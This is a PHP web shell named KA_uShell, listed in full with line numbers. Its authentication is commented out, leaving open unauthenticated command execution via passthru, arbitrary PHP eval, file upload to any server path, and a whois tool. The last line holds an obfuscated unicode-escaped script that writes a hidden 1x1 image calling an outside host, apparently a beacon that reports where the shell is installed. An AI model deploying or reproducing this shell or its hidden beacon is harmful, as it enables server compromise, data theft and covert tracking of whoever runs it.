[ + ] Kadot Universal Shell [ + ]

1. <!--
2.  
3. /+--------------------------------+\
4.  |            KA_uShell           |
5.  |    <KAdot Universal Shell>     |
6.  |         Version 0.1.6          |
7.  |            13.03.04            |
8.  |  Author: KAdot <KAdot@ngs.ru>  |
9.  |--------------------------------|
10. \+                                +/
11.  
12. -->
13. <html>
14. <head>
15. <title>KA_uShell 0.1.6</title>
16. <style type="text/css">
17. <!--
18. body, table{font-family:Verdana; font-size:12px;}
19. table {background-color:#EAEAEA; border-width:0px;}
20. b {font-family:Arial; font-size:15px;}
21. a{text-decoration:none;}
22. -->
23. </style>
24. </head>
25. <body>
26.  
27. <?php
28. $self = $_SERVER['PHP_SELF'];
29. $docr = $_SERVER['DOCUMENT_ROOT'];
30. $sern = $_SERVER['SERVER_NAME'];
31. $tend = "</tr></form></table><br><br><br><br>";
32.  
33. // Configuration
34. $login = "admin";
35. $pass = "123";
36.  
37.  
38. /*/ Authentication
39. if (!isset($_SERVER['PHP_AUTH_USER'])) {
40. header('WWW-Authenticate: Basic realm="KA_uShell"');
41. header('HTTP/1.0 401 Unauthorized');
42. exit;}
43.  
44. else {
45. if(empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_PW']<>$pass || empty($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']<>$login)
46. { echo "×òî íàäî?"; exit;}
47. }
48. */
49.  
50.  
51.  
52. if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
53. elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
54. else {$ac = "shell";}
55.  
56. // Menu
57. echo "
58. |<a href=$self?ac=shell>Shell</a>|
59. |<a href=$self?ac=upload>File Upload</a>|
60. |<a href=$self?ac=tools>Tools</a>|
61. |<a href=$self?ac=eval>PHP Eval Code</a>|
62. |<a href=$self?ac=whois>Whois</a>|
63. <br><br><br><pre>";
64.  
65.  
66. switch($ac) {
67.  
68. // Shell
69. case "shell":
70.  
71. echo <<<HTML
72. <b>Shell</b>
73. <table>
74. <form action="$self" method="POST">
75. <input type="hidden" name="ac" value="shell">
76. <tr><td>
77. $$sern <input size="50" type="text" name="c"><input align="right" type="submit" value="Enter">
78. </td></tr>
79. <tr><td>
80. <textarea cols="100" rows="25">
81. HTML;
82.  
83. if (!empty($_POST['c'])){
84. passthru($_POST['c']);
85. }
86. echo "</textarea></td>$tend";
87. break;
88.  
89.  
90. //PHP Eval Code execution
91. case "eval":
92.  
93. echo <<<HTML
94. <b>PHP Eval Code</b>
95. <table>
96. <form method="POST" action="$self">
97. <input type="hidden" name="ac" value="eval">
98. <tr>
99. <td><textarea name="ephp" rows="10" cols="60"></textarea></td>
100. </tr>
101. <tr>
102. <td><input type="submit" value="Enter"></td>
103. $tend
104. HTML;
105.  
106. if (isset($_POST['ephp'])){
107. eval($_POST['ephp']);
108. }
109. break;
110.  
111.  
112. //Text tools
113. case "tools":
114.  
115. echo <<<HTML
116. <b>Tools</b>
117. <table>
118. <form method="POST" action="$self">
119. <input type="hidden" name="ac" value="tools">
120. <tr>
121. <td>
122. <input type="radio" name="tac" value="1">B64 Decode<br>
123. <input type="radio" name="tac" value="2">B64 Encode<br><hr>
124. <input type="radio" name="tac" value="3">md5 Hash
125. </td>
126. <td><textarea name="tot" rows="5" cols="42"></textarea></td>
127. </tr>
128. <tr>
129. <td> </td>
130. <td><input type="submit" value="Enter"></td>
131. $tend
132. HTML;
133.  
134. if (!empty($_POST['tot']) && !empty($_POST['tac'])) {
135.  
136. switch($_POST['tac']) {
137.  
138. case "1":
139. echo "Ðàñêîäèðîâàííûé òåêñò:<b>" .base64_decode($_POST['tot']). "</b>";
140. break;
141.  
142. case "2":
143. echo "Êîäèðîâàííûé òåêñò:<b>" .base64_encode($_POST['tot']). "</b>";
144. break;
145.  
146. case "3":
147. echo "Êîäèðîâàííûé òåêñò:<b>" .md5($_POST['tot']). "</b>";
148. break;
149. }}
150. break;
151.  
152.  
153. // Uploading
154. case "upload":
155.  
156. echo <<<HTML
157. <b>File Upload</b>
158. <table>
159. <form enctype="multipart/form-data" action="$self" method="POST">
160. <input type="hidden" name="ac" value="upload">
161. <tr>
162. <td>Ôàéëî:</td>
163. <td><input size="48" name="file" type="file"></td>
164. </tr>
165. <tr>
166. <td>Ïàïêà:</td>
167. <td><input size="48" value="$docr/" name="path" type="text"><input type="submit" value="Ïîñëàòü"></td>
168. $tend
169. HTML;
170.  
171. if (isset($_POST['path'])){
172.  
173. $uploadfile = $_POST['path'].$_FILES['file']['name'];
174. if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
175.  
176. if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
177.     echo "Ôàéëî óñïåøíî çàãðóæåí â ïàïêó $uploadfile\n";
178.     echo "Èìÿ:" .$_FILES['file']['name']. "\n";
179.     echo "Ðàçìåð:" .$_FILES['file']['size']. "\n";
180.  
181. } else {
182.     print "Íå óäà¸òñÿ çàãðóçèòü ôàéëî. Èíôà:\n";
183.     print_r($_FILES);
184. }
185. }
186. break;
187.  
188.  
189. // Whois
190. case "whois":
191. echo <<<HTML
192. <b>Whois</b>
193. <table>
194. <form action="$self" method="POST">
195. <input type="hidden" name="ac" value="whois">
196. <tr>
197. <td>Äîìåí:</td>
198. <td><input size="40" type="text" name="wq"></td>
199. </tr>
200. <tr>
201. <td>Õóéç ñåðâåð:</td>
202. <td><input size="40" type="text" name="wser" value="whois.ripe.net"></td>
203. </tr>
204. <tr><td>
205. <input align="right" type="submit" value="Enter">
206. </td></tr>
207. $tend
208. HTML;
209.  
210. if (isset($_POST['wq']) && $_POST['wq']<>"") {
211.  
212. if (empty($_POST['wser'])) {$wser = "whois.ripe.net";} else $wser = $_POST['wser'];
213.  
214. $querty = $_POST['wq']."\r\n";
215. $fp = fsockopen($wser, 43);
216.  
217. if (!$fp) {echo "Íå ìîãó îòêðûòü ñîêåò";} else {
218. fputs($fp, $querty);
219. while(!feof($fp)){echo fgets($fp, 4000);}
220. fclose($fp);
221. }}
222. break;
223.  
224.  
225. }
226. ?>
227. </pre>
228. </body>
229. </html>
230. <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>